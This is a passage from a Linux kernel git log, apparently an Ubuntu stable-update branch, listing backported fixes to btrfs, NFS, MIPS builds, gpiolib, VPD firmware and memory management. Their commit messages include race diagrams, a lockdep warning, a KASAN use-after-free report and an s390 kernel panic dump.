Reported-by: Meng Zhuo <mengzhuo1203@gmail.com>
Signed-off-by: Jiaxun Yang <jiaxun.yang@flygoat.com>
Cc: linux-mips@vger.kernel.org
Cc: Paul Burton <paul.burton@mips.com>
Cc: <stable@vger.kernel.org> # 4.14+
Signed-off-by: Paul Burton <paul.burton@mips.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoMIPS: Disable Loongson MMI instructions for kernel build
Paul Burton [Thu, 10 Oct 2019 18:54:03 +0000 (18:54 +0000)]
MIPS: Disable Loongson MMI instructions for kernel build

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 2f2b4fd674cadd8c6b40eb629e140a14db4068fd upstream.

GCC 9.x automatically enables support for Loongson MMI instructions when
using some -march= flags, and then errors out when -msoft-float is
specified with:

  cc1: error: â€˜-mloongson-mmi’ must be used with â€˜-mhard-float’

The kernel shouldn't be using these MMI instructions anyway, just as it
doesn't use floating point instructions. Explicitly disable them in
order to fix the build with GCC 9.x.

Signed-off-by: Paul Burton <paul.burton@mips.com>
Fixes: 3702bba5eb4f ("MIPS: Loongson: Add GCC 4.4 support for Loongson2E")
Fixes: 6f7a251a259e ("MIPS: Loongson: Add basic Loongson 2F support")
Fixes: 5188129b8c9f ("MIPS: Loongson-3: Improve -march option and move it to Platform")
Cc: Huacai Chen <chenhc@lemote.com>
Cc: Jiaxun Yang <jiaxun.yang@flygoat.com>
Cc: stable@vger.kernel.org # v2.6.32+
Cc: linux-mips@vger.kernel.org
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoNFS: Fix O_DIRECT accounting of number of bytes read/written
Trond Myklebust [Mon, 30 Sep 2019 18:02:56 +0000 (14:02 -0400)]
NFS: Fix O_DIRECT accounting of number of bytes read/written

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 031d73ed768a40684f3ca21992265ffdb6a270bf upstream.

When a series of O_DIRECT reads or writes are truncated, either due to
eof or due to an error, then we should return the number of contiguous
bytes that were received/sent starting at the offset specified by the
application.

Currently, we are failing to correctly check contiguity, and so we're
failing the generic/465 in xfstests when the race between the read
and write RPCs causes the file to get extended while the 2 reads are
outstanding. If the first read RPC call wins the race and returns with
eof set, we should treat the second read RPC as being truncated.

Reported-by: Su Yanjun <suyj.fnst@cn.fujitsu.com>
Fixes: 1ccbad9f9f9bd ("nfs: fix DIO good bytes calculation")
Cc: stable@vger.kernel.org # 4.1+
Signed-off-by: Trond Myklebust <trond.myklebust@hammerspace.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agobtrfs: fix uninitialized ret in ref-verify
Josef Bacik [Wed, 2 Oct 2019 14:03:36 +0000 (10:03 -0400)]
btrfs: fix uninitialized ret in ref-verify

BugLink: https://bugs.launchpad.net/bugs/1848750
commit c5f4987e86f6692fdb12533ea1fc7a7bb98e555a upstream.

Coverity caught a case where we could return with a uninitialized value
in ret in process_leaf.  This is actually pretty likely because we could
very easily run into a block group item key and have a garbage value in
ret and think there was an errror.  Fix this by initializing ret to 0.

Reported-by: Colin Ian King <colin.king@canonical.com>
Fixes: fd708b81d972 ("Btrfs: add a extent ref verify tool")
CC: stable@vger.kernel.org # 4.19+
Signed-off-by: Josef Bacik <josef@toxicpanda.com>
Reviewed-by: David Sterba <dsterba@suse.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agobtrfs: fix incorrect updating of log root tree
Josef Bacik [Mon, 30 Sep 2019 20:27:25 +0000 (16:27 -0400)]
btrfs: fix incorrect updating of log root tree

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 4203e968947071586a98b5314fd7ffdea3b4f971 upstream.

We've historically had reports of being unable to mount file systems
because the tree log root couldn't be read.  Usually this is the "parent
transid failure", but could be any of the related errors, including
"fsid mismatch" or "bad tree block", depending on which block got
allocated.

The modification of the individual log root items are serialized on the
per-log root root_mutex.  This means that any modification to the
per-subvol log root_item is completely protected.

However we update the root item in the log root tree outside of the log
root tree log_mutex.  We do this in order to allow multiple subvolumes
to be updated in each log transaction.

This is problematic however because when we are writing the log root
tree out we update the super block with the _current_ log root node
information.  Since these two operations happen independently of each
other, you can end up updating the log root tree in between writing out
the dirty blocks and setting the super block to point at the current
root.

This means we'll point at the new root node that hasn't been written
out, instead of the one we should be pointing at.  Thus whatever garbage
or old block we end up pointing at complains when we mount the file
system later and try to replay the log.

Fix this by copying the log's root item into a local root item copy.
Then once we're safely under the log_root_tree->log_mutex we update the
root item in the log_root_tree.  This way we do not modify the
log_root_tree while we're committing it, fixing the problem.

CC: stable@vger.kernel.org # 4.4+
Reviewed-by: Chris Mason <clm@fb.com>
Reviewed-by: Filipe Manana <fdmanana@suse.com>
Signed-off-by: Josef Bacik <josef@toxicpanda.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoBtrfs: fix memory leak due to concurrent append writes with fiemap
Filipe Manana [Mon, 30 Sep 2019 09:20:25 +0000 (10:20 +0100)]
Btrfs: fix memory leak due to concurrent append writes with fiemap

BugLink: https://bugs.launchpad.net/bugs/1848750
commit c67d970f0ea8dcc423e112137d34334fa0abb8ec upstream.

When we have a buffered write that starts at an offset greater than or
equals to the file's size happening concurrently with a full ranged
fiemap, we can end up leaking an extent state structure.

Suppose we have a file with a size of 1Mb, and before the buffered write
and fiemap are performed, it has a single extent state in its io tree
representing the range from 0 to 1Mb, with the EXTENT_DELALLOC bit set.

The following sequence diagram shows how the memory leak happens if a
fiemap a buffered write, starting at offset 1Mb and with a length of
4Kb, are performed concurrently.

          CPU 1                                                  CPU 2

  extent_fiemap()
    --> it's a full ranged fiemap
        range from 0 to LLONG_MAX - 1
        (9223372036854775807)

    --> locks range in the inode's
        io tree
      --> after this we have 2 extent
          states in the io tree:
          --> 1 for range [0, 1Mb[ with
              the bits EXTENT_LOCKED and
              EXTENT_DELALLOC_BITS set
          --> 1 for the range
              [1Mb, LLONG_MAX[ with
              the EXTENT_LOCKED bit set

                                                  --> start buffered write at offset
                                                      1Mb with a length of 4Kb

                                                  btrfs_file_write_iter()

                                                    btrfs_buffered_write()
                                                      --> cached_state is NULL

                                                      lock_and_cleanup_extent_if_need()
                                                        --> returns 0 and does not lock
                                                            range because it starts
                                                            at current i_size / eof

                                                      --> cached_state remains NULL

                                                      btrfs_dirty_pages()
                                                        btrfs_set_extent_delalloc()
                                                          (...)
                                                          __set_extent_bit()

                                                            --> splits extent state for range
                                                                [1Mb, LLONG_MAX[ and now we
                                                                have 2 extent states:

                                                                --> one for the range
                                                                    [1Mb, 1Mb + 4Kb[ with
                                                                    EXTENT_LOCKED set
                                                                --> another one for the range
                                                                    [1Mb + 4Kb, LLONG_MAX[ with
                                                                    EXTENT_LOCKED set as well

                                                            --> sets EXTENT_DELALLOC on the
                                                                extent state for the range
                                                                [1Mb, 1Mb + 4Kb[
                                                            --> caches extent state
                                                                [1Mb, 1Mb + 4Kb[ into
                                                                @cached_state because it has
                                                                the bit EXTENT_LOCKED set

                                                    --> btrfs_buffered_write() ends up
                                                        with a non-NULL cached_state and
                                                        never calls anything to release its
                                                        reference on it, resulting in a
                                                        memory leak

Fix this by calling free_extent_state() on cached_state if the range was
not locked by lock_and_cleanup_extent_if_need().

The same issue can happen if anything else other than fiemap locks a range
that covers eof and beyond.

This could be triggered, sporadically, by test case generic/561 from the
fstests suite, which makes duperemove run concurrently with fsstress, and
duperemove does plenty of calls to fiemap. When CONFIG_BTRFS_DEBUG is set
the leak is reported in dmesg/syslog when removing the btrfs module with
a message like the following:

  [77100.039461] BTRFS: state leak: start 6574080 end 6582271 state 16402 in tree 0 refs 1

Otherwise (CONFIG_BTRFS_DEBUG not set) detectable with kmemleak.

CC: stable@vger.kernel.org # 4.16+
Reviewed-by: Josef Bacik <josef@toxicpanda.com>
Signed-off-by: Filipe Manana <fdmanana@suse.com>
Reviewed-by: David Sterba <dsterba@suse.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agobtrfs: fix balance convert to single on 32-bit host CPUs
Zygo Blaxell [Thu, 12 Sep 2019 23:55:01 +0000 (19:55 -0400)]
btrfs: fix balance convert to single on 32-bit host CPUs

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 7a54789074a54f64addf5b49bf1994f478337a83 upstream.

Currently, the command:

btrfs balance start -dconvert=single,soft .

on a Raspberry Pi produces the following kernel message:

BTRFS error (device mmcblk0p2): balance: invalid convert data profile single

This fails because we use is_power_of_2(unsigned long) to validate
the new data profile, the constant for 'single' profile uses bit 48,
and there are only 32 bits in a long on ARM.

Fix by open-coding the check using u64 variables.

Tested by completing the original balance command on several Raspberry
Pis.

Fixes: 818255feece6 ("btrfs: use common helper instead of open coding a bit test")
CC: stable@vger.kernel.org # 4.20+
Signed-off-by: Zygo Blaxell <ce3g8jdj@umail.furryterror.org>
Reviewed-by: David Sterba <dsterba@suse.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agobtrfs: allocate new inode in NOFS context
Josef Bacik [Mon, 9 Sep 2019 14:12:04 +0000 (10:12 -0400)]
btrfs: allocate new inode in NOFS context

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 11a19a90870ea5496a8ded69b86f5b476b6d3355 upstream.

A user reported a lockdep splat

 ======================================================
 WARNING: possible circular locking dependency detected
 5.2.11-gentoo #2 Not tainted
 ------------------------------------------------------
 kswapd0/711 is trying to acquire lock:
 000000007777a663 (sb_internal){.+.+}, at: start_transaction+0x3a8/0x500

but task is already holding lock:
 000000000ba86300 (fs_reclaim){+.+.}, at: __fs_reclaim_acquire+0x0/0x30

which lock already depends on the new lock.

the existing dependency chain (in reverse order) is:

-> #1 (fs_reclaim){+.+.}:
 kmem_cache_alloc+0x1f/0x1c0
 btrfs_alloc_inode+0x1f/0x260
 alloc_inode+0x16/0xa0
 new_inode+0xe/0xb0
 btrfs_new_inode+0x70/0x610
 btrfs_symlink+0xd0/0x420
 vfs_symlink+0x9c/0x100
 do_symlinkat+0x66/0xe0
 do_syscall_64+0x55/0x1c0
 entry_SYSCALL_64_after_hwframe+0x49/0xbe

-> #0 (sb_internal){.+.+}:
 __sb_start_write+0xf6/0x150
 start_transaction+0x3a8/0x500
 btrfs_commit_inode_delayed_inode+0x59/0x110
 btrfs_evict_inode+0x19e/0x4c0
 evict+0xbc/0x1f0
 inode_lru_isolate+0x113/0x190
 __list_lru_walk_one.isra.4+0x5c/0x100
 list_lru_walk_one+0x32/0x50
 prune_icache_sb+0x36/0x80
 super_cache_scan+0x14a/0x1d0
 do_shrink_slab+0x131/0x320
 shrink_node+0xf7/0x380
 balance_pgdat+0x2d5/0x640
 kswapd+0x2ba/0x5e0
 kthread+0x147/0x160
 ret_from_fork+0x24/0x30

other info that might help us debug this:

 Possible unsafe locking scenario:

 CPU0 CPU1
 ---- ----
 lock(fs_reclaim);
 lock(sb_internal);
 lock(fs_reclaim);
 lock(sb_internal);

Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agobtrfs: relocation: fix use-after-free on dead relocation roots
Qu Wenruo [Mon, 23 Sep 2019 06:56:14 +0000 (14:56 +0800)]
btrfs: relocation: fix use-after-free on dead relocation roots

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 1fac4a54374f7ef385938f3c6cf7649c0fe4f6cd upstream.

[BUG]
One user reported a reproducible KASAN report about use-after-free:

  BTRFS info (device sdi1): balance: start -dvrange=1256811659264..1256811659265
  BTRFS info (device sdi1): relocating block group 1256811659264 flags data|raid0
  ==================================================================
  BUG: KASAN: use-after-free in btrfs_init_reloc_root+0x2cd/0x340 [btrfs]
  Write of size 8 at addr ffff88856f671710 by task kworker/u24:10/261579

  CPU: 2 PID: 261579 Comm: kworker/u24:10 Tainted: P           OE     5.2.11-arch1-1-kasan #4
  Hardware name: To Be Filled By O.E.M. To Be Filled By O.E.M./X99 Extreme4, BIOS P3.80 04/06/2018
  Workqueue: btrfs-endio-write btrfs_endio_write_helper [btrfs]
  Call Trace:
   dump_stack+0x7b/0xba
   print_address_description+0x6c/0x22e
   ? btrfs_init_reloc_root+0x2cd/0x340 [btrfs]
   __kasan_report.cold+0x1b/0x3b
   ? btrfs_init_reloc_root+0x2cd/0x340 [btrfs]
   kasan_report+0x12/0x17
   __asan_report_store8_noabort+0x17/0x20
   btrfs_init_reloc_root+0x2cd/0x340 [btrfs]
   record_root_in_trans+0x2a0/0x370 [btrfs]
   btrfs_record_root_in_trans+0xf4/0x140 [btrfs]
   start_transaction+0x1ab/0xe90 [btrfs]
   btrfs_join_transaction+0x1d/0x20 [btrfs]
   btrfs_finish_ordered_io+0x7bf/0x18a0 [btrfs]
   ? lock_repin_lock+0x400/0x400
   ? __kmem_cache_shutdown.cold+0x140/0x1ad
   ? btrfs_unlink_subvol+0x9b0/0x9b0 [btrfs]
   finish_ordered_fn+0x15/0x20 [btrfs]
   normal_work_helper+0x1bd/0xca0 [btrfs]
   ? process_one_work+0x819/0x1720
   ? kasan_check_read+0x11/0x20
   btrfs_endio_write_helper+0x12/0x20 [btrfs]
   process_one_work+0x8c9/0x1720
   ? pwq_dec_nr_in_flight+0x2f0/0x2f0
   ? worker_thread+0x1d9/0x1030
   worker_thread+0x98/0x1030
   kthread+0x2bb/0x3b0
   ? process_one_work+0x1720/0x1720
   ? kthread_park+0x120/0x120
   ret_from_fork+0x35/0x40

  Allocated by task 369692:
   __kasan_kmalloc.part.0+0x44/0xc0
   __kasan_kmalloc.constprop.0+0xba/0xc0
   kasan_kmalloc+0x9/0x10
   kmem_cache_alloc_trace+0x138/0x260
   btrfs_read_tree_root+0x92/0x360 [btrfs]
   btrfs_read_fs_root+0x10/0xb0 [btrfs]
   create_reloc_root+0x47d/0xa10 [btrfs]
   btrfs_init_reloc_root+0x1e2/0x340 [btrfs]
   record_root_in_trans+0x2a0/0x370 [btrfs]
   btrfs_record_root_in_trans+0xf4/0x140 [btrfs]
   start_transaction+0x1ab/0xe90 [btrfs]
   btrfs_start_transaction+0x1e/0x20 [btrfs]
   __btrfs_prealloc_file_range+0x1c2/0xa00 [btrfs]
   btrfs_prealloc_file_range+0x13/0x20 [btrfs]
   prealloc_file_extent_cluster+0x29f/0x570 [btrfs]
   relocate_file_extent_cluster+0x193/0xc30 [btrfs]
   relocate_data_extent+0x1f8/0x490 [btrfs]
   relocate_block_group+0x600/0x1060 [btrfs]
   btrfs_relocate_block_group+0x3a0/0xa00 [btrfs]
   btrfs_relocate_chunk+0x9e/0x180 [btrfs]
   btrfs_balance+0x14e4/0x2fc0 [btrfs]
   btrfs_ioctl_balance+0x47f/0x640 [btrfs]
   btrfs_ioctl+0x119d/0x8380 [btrfs]
   do_vfs_ioctl+0x9f5/0x1060
   ksys_ioctl+0x67/0x90
   __x64_sys_ioctl+0x73/0xb0
   do_syscall_64+0xa5/0x370
   entry_SYSCALL_64_after_hwframe+0x44/0xa9

  Freed by task 369692:
   __kasan_slab_free+0x14f/0x210
   kasan_slab_free+0xe/0x10
   kfree+0xd8/0x270
   btrfs_drop_snapshot+0x154c/0x1eb0 [btrfs]
   clean_dirty_subvols+0x227/0x340 [btrfs]
   relocate_block_group+0x972/0x1060 [btrfs]
   btrfs_relocate_block_group+0x3a0/0xa00 [btrfs]
   btrfs_relocate_chunk+0x9e/0x180 [btrfs]
   btrfs_balance+0x14e4/0x2fc0 [btrfs]
   btrfs_ioctl_balance+0x47f/0x640 [btrfs]
   btrfs_ioctl+0x119d/0x8380 [btrfs]
   do_vfs_ioctl+0x9f5/0x1060
   ksys_ioctl+0x67/0x90
   __x64_sys_ioctl+0x73/0xb0
   do_syscall_64+0xa5/0x370
   entry_SYSCALL_64_after_hwframe+0x44/0xa9

  The buggy address belongs to the object at ffff88856f671100
   which belongs to the cache kmalloc-4k of size 4096
  The buggy address is located 1552 bytes inside of
   4096-byte region [ffff88856f671100ffff88856f672100)
  The buggy address belongs to the page:
  page:ffffea0015bd9c00 refcount:1 mapcount:0 mapping:ffff88864400e600 index:0x0 compound_mapcount: 0
  flags: 0x2ffff0000010200(slab|head)
  raw: 02ffff0000010200 dead000000000100 dead000000000200 ffff88864400e600
  raw: 0000000000000000 0000000000070007 00000001ffffffff 0000000000000000
  page dumped because: kasan: bad access detected

  Memory state around the buggy address:
   ffff88856f671600: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
   ffff88856f671680: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
  >ffff88856f671700: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
                           ^
   ffff88856f671780: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
   ffff88856f671800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
  ==================================================================
  BTRFS info (device sdi1): 1 enospc errors during balance
  BTRFS info (device sdi1): balance: ended with status: -28

[CAUSE]
The problem happens when finish_ordered_io() get called with balance
still running, while the reloc root of that subvolume is already dead.
(Tree is swap already done, but tree not yet deleted for possible qgroup
usage.)

That means root->reloc_root still exists, but that reloc_root can be
under btrfs_drop_snapshot(), thus we shouldn't access it.

The following race could cause the use-after-free problem:

                CPU1              |                CPU2
--------------------------------------------------------------------------
                                  | relocate_block_group()
                                  | |- unset_reloc_control(rc)
                                  | |- btrfs_commit_transaction()
btrfs_finish_ordered_io()         | |- clean_dirty_subvols()
|- btrfs_join_transaction()       |    |
   |- record_root_in_trans()      |    |
      |- btrfs_init_reloc_root()  |    |
         |- if (root->reloc_root) |    |
         |                        |    |- root->reloc_root = NULL
         |                        |    |- btrfs_drop_snapshot(reloc_root);
         |- reloc_root->last_trans|
                 = trans->transid |
    ^^^^^^^^^^^^^^^^^^^^^^
            Use after free

[FIX]
Fix it by the following modifications:

- Test if the root has dead reloc tree before accessing root->reloc_root
  If the root has BTRFS_ROOT_DEAD_RELOC_TREE, then we don't need to
  create or update root->reloc_tree

- Clear the BTRFS_ROOT_DEAD_RELOC_TREE flag until we have fully dropped
  reloc tree
  To co-operate with above modification, so as long as
  BTRFS_ROOT_DEAD_RELOC_TREE is still set, we won't try to re-create
  reloc tree at record_root_in_trans().

Reported-by: Cebtenzzre <cebtenzzre@gmail.com>
Fixes: d2311e698578 ("btrfs: relocation: Delay reloc tree deletion after merge_reloc_roots")
CC: stable@vger.kernel.org # 5.1+
Reviewed-by: Josef Bacik <josef@toxicpanda.com>
Reviewed-by: Filipe Manana <fdmanana@suse.com>
Signed-off-by: Qu Wenruo <wqu@suse.com>
Reviewed-by: David Sterba <dsterba@suse.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agogpiolib: don't clear FLAG_IS_OUT when emulating open-drain/open-source
Bartosz Golaszewski [Mon, 14 Oct 2019 15:54:35 +0000 (17:54 +0200)]
gpiolib: don't clear FLAG_IS_OUT when emulating open-drain/open-source

BugLink: https://bugs.launchpad.net/bugs/1848750
[ Upstream commit e735244e2cf068f98b6384681a38993e0517a838 ]

When emulating open-drain/open-source by not actively driving the output
lines - we're simply changing their mode to input. This is wrong as it
will then make it impossible to change the value of such line - it's now
considered to actually be in input mode. If we want to still use the
direction_input() callback for simplicity then we need to set FLAG_IS_OUT
manually in gpiod_direction_output() and not clear it in
gpio_set_open_drain_value_commit() and
gpio_set_open_source_value_commit().

Fixes: c663e5f56737 ("gpio: support native single-ended hardware drivers")
Cc: stable@vger.kernel.org
Reported-by: Kent Gibson <warthog618@gmail.com>
Signed-off-by: Bartosz Golaszewski <bgolaszewski@baylibre.com>
[Bartosz: backported to v5.3, v4.19]
Signed-off-by: Bartosz Golaszewski <bgolaszewski@baylibre.com>
Signed-off-by: Sasha Levin <sashal@kernel.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agogpio: fix getting nonexclusive gpiods from DT
Marco Felsch [Mon, 14 Oct 2019 15:53:41 +0000 (17:53 +0200)]
gpio: fix getting nonexclusive gpiods from DT

BugLink: https://bugs.launchpad.net/bugs/1848750
[ Upstream commit be7ae45cfea97e787234e00e1a9eb341acacd84e ]

Since commit ec757001c818 ("gpio: Enable nonexclusive gpiods from DT
nodes") we are able to get GPIOD_FLAGS_BIT_NONEXCLUSIVE marked gpios.
Currently the gpiolib uses the wrong flags variable for the check. We
need to check the gpiod_flags instead of the of_gpio_flags else we
return -EBUSY for GPIOD_FLAGS_BIT_NONEXCLUSIVE marked and requested
gpiod's.

Fixes: ec757001c818 gpio: Enable nonexclusive gpiods from DT nodes
Cc: stable@vger.kernel.org
Signed-off-by: Marco Felsch <m.felsch@pengutronix.de>
[Bartosz: the function was moved to gpiolib-of.c so updated the patch]
Signed-off-by: Bartosz Golaszewski <bgolaszewski@baylibre.com>
[Bartosz: backported to v5.3.y]
Signed-off-by: Bartosz Golaszewski <bgolaszewski@baylibre.com>
Signed-off-by: Sasha Levin <sashal@kernel.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agofirmware: google: increment VPD key_len properly
Brian Norris [Mon, 30 Sep 2019 21:45:22 +0000 (14:45 -0700)]
firmware: google: increment VPD key_len properly

BugLink: https://bugs.launchpad.net/bugs/1848750
[ Upstream commit 442f1e746e8187b9deb1590176f6b0ff19686b11 ]

Commit 4b708b7b1a2c ("firmware: google: check if size is valid when
decoding VPD data") adds length checks, but the new vpd_decode_entry()
function botched the logic -- it adds the key length twice, instead of
adding the key and value lengths separately.

On my local system, this means vpd.c's vpd_section_create_attribs() hits
an error case after the first attribute it parses, since it's no longer
looking at the correct offset. With this patch, I'm back to seeing all
the correct attributes in /sys/firmware/vpd/...

Fixes: 4b708b7b1a2c ("firmware: google: check if size is valid when decoding VPD data")
Cc: <stable@vger.kernel.org>
Cc: Hung-Te Lin <hungte@chromium.org>
Signed-off-by: Brian Norris <briannorris@chromium.org>
Reviewed-by: Stephen Boyd <swboyd@chromium.org>
Reviewed-by: Guenter Roeck <groeck@chromium.org>
Link: https://lore.kernel.org/r/20190930214522.240680-1-briannorris@chromium.org
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Sasha Levin <sashal@kernel.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agoIB/core: Fix wrong iterating on ports
Mohamad Heib [Wed, 2 Oct 2019 12:21:27 +0000 (15:21 +0300)]
IB/core: Fix wrong iterating on ports

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 1cbe866cbcb53338de33cf67262e73f9315a9725 upstream.

rdma_for_each_port is already incrementing the iterator's value it
receives therefore, after the first iteration the iterator is increased by
2 which eventually causing wrong queries and possible traces.

Fix the above by removing the old redundant incrementation that was used
before rdma_for_each_port() macro.

Cc: <stable@vger.kernel.org>
Fixes: ea1075edcbab ("RDMA: Add and use rdma_for_each_port")
Link: https://lore.kernel.org/r/20191002122127.17571-1-leon@kernel.org
Signed-off-by: Mohamad Heib <mohamadh@mellanox.com>
Reviewed-by: Erez Alfasi <ereza@mellanox.com>
Signed-off-by: Leon Romanovsky <leonro@mellanox.com>
Reviewed-by: Jason Gunthorpe <jgg@mellanox.com>
Signed-off-by: Jason Gunthorpe <jgg@mellanox.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agomm/vmpressure.c: fix a signedness bug in vmpressure_register_event()
Dan Carpenter [Mon, 7 Oct 2019 00:58:28 +0000 (17:58 -0700)]
mm/vmpressure.c: fix a signedness bug in vmpressure_register_event()

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 518a86713078168acd67cf50bc0b45d54b4cce6c upstream.

The "mode" and "level" variables are enums and in this context GCC will
treat them as unsigned ints so the error handling is never triggered.

I also removed the bogus initializer because it isn't required any more
and it's sort of confusing.

[akpm@linux-foundation.org: reduce implicit and explicit typecasting]
[akpm@linux-foundation.org: fix return value, add comment, per Matthew]
Link: http://lkml.kernel.org/r/20190925110449.GO3264@mwanda
Fixes: 3cadfa2b9497 ("mm/vmpressure.c: convert to use match_string() helper")
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Reviewed-by: Andy Shevchenko <andriy.shevchenko@linux.intel.com>
Acked-by: David Rientjes <rientjes@google.com>
Reviewed-by: Matthew Wilcox <willy@infradead.org>
Cc: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: Enrico Weigelt <info@metux.net>
Cc: Kate Stewart <kstewart@linuxfoundation.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
4 years agomm/page_alloc.c: fix a crash in free_pages_prepare()
Qian Cai [Mon, 7 Oct 2019 00:58:25 +0000 (17:58 -0700)]
mm/page_alloc.c: fix a crash in free_pages_prepare()

BugLink: https://bugs.launchpad.net/bugs/1848750
commit 234fdce892f905cbc2674349a9eb4873e288e5b3 upstream.

On architectures like s390, arch_free_page() could mark the page unused
(set_page_unused()) and any access later would trigger a kernel panic.
Fix it by moving arch_free_page() after all possible accessing calls.

 Hardware name: IBM 2964 N96 400 (z/VM 6.4.0)
 Krnl PSW : 0404e00180000000 0000000026c2b96e (__free_pages_ok+0x34e/0x5d8)
            R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:2 PM:0 RI:0 EA:3
 Krnl GPRS: 0000000088d43af7 0000000000484000 000000000000007c 000000000000000f
            000003d080012100 000003d080013fc0 0000000000000000 0000000000100000
            00000000275cca48 0000000000000100 0000000000000008 000003d080010000
            00000000000001d0 000003d000000000 0000000026c2b78a 000000002717fdb0
 Krnl Code: 0000000026c2b95cec1100b30659 risbgn %r1,%r1,0,179,6
            0000000026c2b962e32014000036 pfd 2,1024(%r1)
           #0000000026c2b968d7ff10001000 xc 0(256,%r1),0(%r1)
           >0000000026c2b96e41101100  la %r1,256(%r1)
            0000000026c2b972a737fff8  brctg %r3,26c2b962
            0000000026c2b976d7ff10001000 xc 0(256,%r1),0(%r1)
            0000000026c2b97ce31003400004 lg %r1,832
            0000000026c2b982ebff1430016a asi 5168(%r1),-1
 Call Trace:
 __free_pages_ok+0x16a/0x5d8)
 memblock_free_all+0x206/0x290
 mem_init+0x58/0x120
 start_kernel+0x2b0/0x570
 startup_continue+0x6a/0xc0
 INFO: lockdep is turned off.
 Last Breaking-Event-Address:
 __free_pages_ok+0x372/0x5d8
 Kernel panic - not syncing: Fatal exception: panic_on_oops
 00: HCPGIR450W CP entered; disabled wait PSW 00020001 80000000 00000000 26A2379C

In the past, only kernel_poison_pages() would trigger this but it needs
"page_poison=on" kernel cmdline, and I suspect nobody tested that on
s390.  Recently, kernel_init_free_pages() (commit 6471384af2a6 ("mm:
security: introduce init_on_alloc=1 and init_on_free=1 boot options"))
was added and could trigger this as well.

[akpm@linux-foundation.org: add comment]
Link: http://lkml.kernel.org/r/1569613623-16820-1-git-send-email-cai@lca.pw
Fixes: 8823b1dbc05f ("mm/page_poison.c: enable PAGE_POISONING as a separate option")
Fixes: 6471384af2a6 ("mm: security: introduce init_on_alloc=1 and init_on_free=1 boot options")
Signed-off-by: Qian Cai <cai@lca.pw>
Reviewed-by: Heiko Carstens <heiko.carstens@de.ibm.com>
Acked-by: Christian Borntraeger <borntraeger@de.ibm.com>
Acked-by: Michal Hocko <mhocko@suse.com>
Cc: "Kirill A. Shutemov" <kirill@shutemov.name>
Cc: Vasily Gorbik <gor@linux.ibm.com>
Cc: Alexander Duyck <alexander.duyck@gmail.com>
Cc: <stable@vger.kernel.org> [5.3+]
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Connor Kuehl <connor.kuehl@canonical.com>
Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
